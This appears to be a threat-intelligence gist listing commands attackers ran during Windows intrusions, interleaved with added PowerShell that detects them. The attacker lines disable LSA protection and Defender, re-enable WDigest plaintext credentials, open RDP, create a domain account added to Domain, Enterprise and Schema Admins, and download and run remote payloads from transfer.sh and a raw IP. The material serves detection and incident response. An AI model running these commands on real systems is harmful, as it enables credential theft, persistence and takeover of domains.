reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
powershell -command "iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))"
# Check for Administrator rights
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
    Write-Host 'Please Run as Administrator!' -ForegroundColor Red
    Exit
}
# Check and return current user name
$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]
# Paths
# Excerpt from Application.evtx EventID 0
EventData:
  Data:
  - "Transferred files with action 'Transfer':\r\nRunSchedulerTask.ps1\r\nRunSchedulerTaskOnce.ps1\r\n\r\nVersion: 22.10.11109.8417\r\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (9dd8b1107d6a42d9)\\ScreenConnect.ClientService.exe\r\n"
Channel: Application
EventID: 0
EventID_attributes:
  SystemTime: "2024-02-23T04:06:06Z"
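As an added example (not part of the original gist): a PowerShell parser for the ScreenConnect "Transferred files" message layout shown in the excerpt above, followed by a hunt over the live Application log. The sample message is constructed from the excerpt; the event provider name is not on the page, so the live query filters on the message text rather than the provider (assumption).

```powershell
# Added example, not from the original gist. Parses ScreenConnect "Transferred files"
# messages (layout taken from the Application.evtx excerpt above) into objects.
function ConvertFrom-ScreenConnectTransfer {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Message)
    process {
        # First line: "Transferred files with action '<Action>':"; then one file name per
        # line, a blank line, then "Version: ..." and "Executable Path: ...".
        if ($Message -match "^Transferred files with action '(?<action>[^']+)':") {
            $action = $Matches['action']
        } else {
            return
        }
        $files = @(); $version = $null; $exe = $null
        foreach ($line in ($Message -split "`r?`n" | Select-Object -Skip 1)) {
            $line = $line.Trim()
            if ($line -match '^Version:\s*(.+)$')         { $version = $Matches[1]; continue }
            if ($line -match '^Executable Path:\s*(.+)$') { $exe = $Matches[1];     continue }
            if ($line) { $files += $line }
        }
        [pscustomobject]@{
            Action         = $action
            Files          = $files
            # scripts and binaries pushed through the remote-support tool are the interesting ones
            ScriptFiles    = @($files | Where-Object { $_ -match '\.(ps1|bat|cmd|vbs|js|exe|dll|dat)$' })
            Version        = $version
            ExecutablePath = $exe
        }
    }
}

# Constructed sample, copied from the event excerpt above
$sample = "Transferred files with action 'Transfer':`r`nRunSchedulerTask.ps1`r`nRunSchedulerTaskOnce.ps1`r`n`r`n" +
          "Version: 22.10.11109.8417`r`nExecutable Path: C:\Program Files (x86)\ScreenConnect Client (9dd8b1107d6a42d9)\ScreenConnect.ClientService.exe`r`n"
$sample | ConvertFrom-ScreenConnectTransfer | Format-List
# Action: Transfer; Files: RunSchedulerTask.ps1, RunSchedulerTaskOnce.ps1 (both also in ScriptFiles)

# Live hunt on a host. Assumption: entries land in the Application log with Id 0 as in the
# excerpt; the provider name is not shown on the page, so we filter on the message text.
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; Id = 0 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -like 'Transferred files with action*' } |
    ForEach-Object {
        $t = $_.Message | ConvertFrom-ScreenConnectTransfer
        $t | Add-Member -NotePropertyName TimeCreated -NotePropertyValue $_.TimeCreated -PassThru
    } |
    Where-Object { $_.ScriptFiles.Count -gt 0 } |
    Format-Table TimeCreated, Action, ScriptFiles, ExecutablePath -AutoSize
```

The parser keeps every transferred file name; the final filter narrows to script and binary extensions because a legitimate support session rarely needs to drop `.ps1` files that are then run by a scheduler task.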
net user /add default test@2021! /domain
net group "Domain Admins" default /add /domain
net group "Enterprise Admins" default /add /domain
net group "Remote Desktop Users" default /add /domain
net group "Group Policy Creator Owners" default /add /domain
net group "Schema Admins" default /add /domain
net user default /active:yes /domain
net user /add default1 test@2021! /domain
net user /add default1 test@2021! /domain
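As an added example (not part of the original gist): two PowerShell checks for the activity the net commands above produce, one against Active Directory (recently created accounts that are members of the targeted groups) and one against the domain controller's Security log (account creation followed by group additions). Both need the ActiveDirectory RSAT module or DC log access; the 7-day window and the assumption that "Remote Desktop Users" resolves to the domain's Builtin group are mine.

```powershell
# Added example, not from the original gist. Finds domain accounts created recently that sit in
# the groups the net commands above add to. Needs the ActiveDirectory RSAT module and rights to
# read group membership; the 7-day window is an assumption.
Import-Module ActiveDirectory

function Find-NewPrivilegedAccounts {
    param(
        [int]$Days = 7,
        [string[]]$Groups = @('Domain Admins', 'Enterprise Admins', 'Schema Admins',
                              'Group Policy Creator Owners', 'Remote Desktop Users')
    )
    $since = (Get-Date).AddDays(-$Days)
    foreach ($g in $Groups) {
        $group = Get-ADGroup -Filter "Name -eq '$g'" -ErrorAction SilentlyContinue
        if (-not $group) { continue }
        Get-ADGroupMember -Identity $group -Recursive |
            Where-Object { $_.objectClass -eq 'user' } |
            Get-ADUser -Properties whenCreated, Enabled |
            Where-Object { $_.whenCreated -ge $since } |
            ForEach-Object {
                [pscustomobject]@{
                    Group          = $g
                    SamAccountName = $_.SamAccountName
                    Created        = $_.whenCreated
                    Enabled        = $_.Enabled
                }
            }
    }
}

# Same question from the DC Security log: 4720 = account created; 4728 / 4732 / 4756 = member
# added to a global / domain-local / universal security group. Correlate on the account name.
function Get-RecentAccountAndGroupEvents([int]$Days = 7) {
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4720, 4728, 4732, 4756
                                     StartTime = (Get-Date).AddDays(-$Days) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            $x.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
            $isGroupAdd = $_.Id -ne 4720
            # 4720 names the new account in TargetUserName; the 47xx group events put the
            # member in MemberName and the group in TargetUserName
            $account = if ($isGroupAdd) { $d['MemberName'] } else { $d['TargetUserName'] }
            $group   = if ($isGroupAdd) { $d['TargetUserName'] } else { $null }
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Id      = $_.Id
                Subject = $d['SubjectUserName']
                Account = $account
                Group   = $group
            }
        }
}

Find-NewPrivilegedAccounts | Sort-Object Created -Descending | Format-Table -AutoSize
Get-RecentAccountAndGroupEvents | Sort-Object Time | Format-Table -AutoSize
```

A burst of 4720 followed within seconds by several 4728/4756 events for the same account, all with the same SubjectUserName, is the log shape of the command sequence above; the AD query catches the same thing after the fact even if the logs have rolled.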
# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf
# Exclude directory in Defender
powershell.exe Add-MpPreference -ExclusionPath C:\programdata -Force
# Deploy beacon
rundll32.exe c:\programdata\update.dat UpdateSystem
$listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json',
         'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json',
         'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json',
         'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json',
         'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json',
         'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json',
         'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json',
         'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json',
         'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json',
         'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json',
powershell -command "iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]transfer[.]sh/gUHRYTNxj8/injcet2[.]ps1'))"
curl hxxp[://]minish[.]wiki[.]gd/c[.]pdf -o c:\programdata\update[.]dat
# adversary excluded directories and neutralised Defender
powershell -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true;
Set-MpPreference -ExclusionPath C:\Windows\Temp;
# then downloaded their file
Invoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\Windows\Temp\svchost.exe;
C:\Windows\Temp\svchost.exe
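As an added example (not part of the original gists): a single PowerShell audit that checks one host for the exact settings the reg, netsh and Defender commands on this page change: LSA protection (RunAsPPL) turned off, WDigest plaintext caching turned on, the hidden uninstall entry, RDP enablement, the ad-hoc "rdp" and WMI firewall rules, and Defender real-time protection and path exclusions. Run it elevated; Get-MpPreference needs Defender and Get-NetFirewallRule needs the NetSecurity module. Flagging only the `nvspbind` key name among hidden uninstall entries is my assumption, since many Microsoft redistributables set SystemComponent=1 legitimately.

```powershell
# Added example, not from the original gists: audit one host for the changes the commands on
# this page make. Run in an elevated PowerShell. Returns one object per check so the output can
# be scheduled and diffed over time.
function Get-RegValue([string]$Path, [string]$Name) {
    # $null when the value or key is absent, which is distinct from an explicit 0 or 1
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

function Test-TamperedSettings {
    $f = [System.Collections.Generic.List[object]]::new()
    $add = { param($Check, $Suspicious, $Value)
        $f.Add([pscustomobject]@{ Check = $Check; Suspicious = [bool]$Suspicious; Value = $Value }) }

    # 1. LSA protection explicitly turned off (value present and 0); absent means never enabled
    $ppl = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL'
    & $add 'LSA RunAsPPL' ($null -ne $ppl -and $ppl -eq 0) $ppl

    # 2. WDigest plaintext credential caching re-enabled (lets mimikatz-style tools read passwords)
    $wd = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
    & $add 'WDigest UseLogonCredential' ($wd -eq 1) $wd

    # 3. RDP allowed at the Terminal Server level
    $ts = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections'
    & $add 'RDP fDenyTSConnections' ($ts -eq 0) $ts

    # 4. Uninstall entries hidden from Programs and Features via SystemComponent=1. All are listed;
    #    only the key name seen on this page is flagged (assumption), the rest need a human look.
    $uninstall = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall',
                 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall'
    Get-ChildItem $uninstall -ErrorAction SilentlyContinue |
        ForEach-Object { Get-ItemProperty $_.PSPath } |
        Where-Object { $_.SystemComponent -eq 1 } |
        ForEach-Object { & $add "Hidden uninstall entry: $($_.PSChildName)" ($_.PSChildName -eq 'nvspbind') $_.DisplayName }

    # 5. Defender real-time protection and the two exclusion paths used on this page
    $mp = Get-MpPreference -ErrorAction SilentlyContinue
    if ($mp) {
        & $add 'Defender DisableRealtimeMonitoring' $mp.DisableRealtimeMonitoring $mp.DisableRealtimeMonitoring
        $bad = @($mp.ExclusionPath | Where-Object { $_ -match '^C:\\(programdata|windows\\temp)\\?$' })
        & $add 'Defender ExclusionPath' ($bad.Count -gt 0) ($mp.ExclusionPath -join '; ')
    }

    # 6. Firewall: the ad-hoc rule named "rdp" and the WMI rule group enabled inbound
    $rdp = Get-NetFirewallRule -DisplayName 'rdp' -ErrorAction SilentlyContinue
    & $add 'Firewall rule named "rdp"' ($null -ne $rdp) ($rdp | ForEach-Object { "$($_.Direction)/$($_.Action)/Enabled=$($_.Enabled)" })
    $wmi = @(Get-NetFirewallRule -DisplayGroup 'Windows Management Instrumentation (WMI)' -ErrorAction SilentlyContinue |
             Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' })
    & $add 'WMI inbound firewall rules enabled' ($wmi.Count -gt 0) $wmi.Count

    return $f
}

Test-TamperedSettings | Format-Table Check, Suspicious, Value -AutoSize
```

On a clean workstation every Suspicious column reads False: RunAsPPL is either absent or 1, UseLogonCredential is absent, fDenyTSConnections is 1, no "rdp" rule exists and the WMI inbound rules are disabled. RDP being enabled is normal on many servers, so treat check 3 as context for the firewall and WDigest findings rather than a standalone alert.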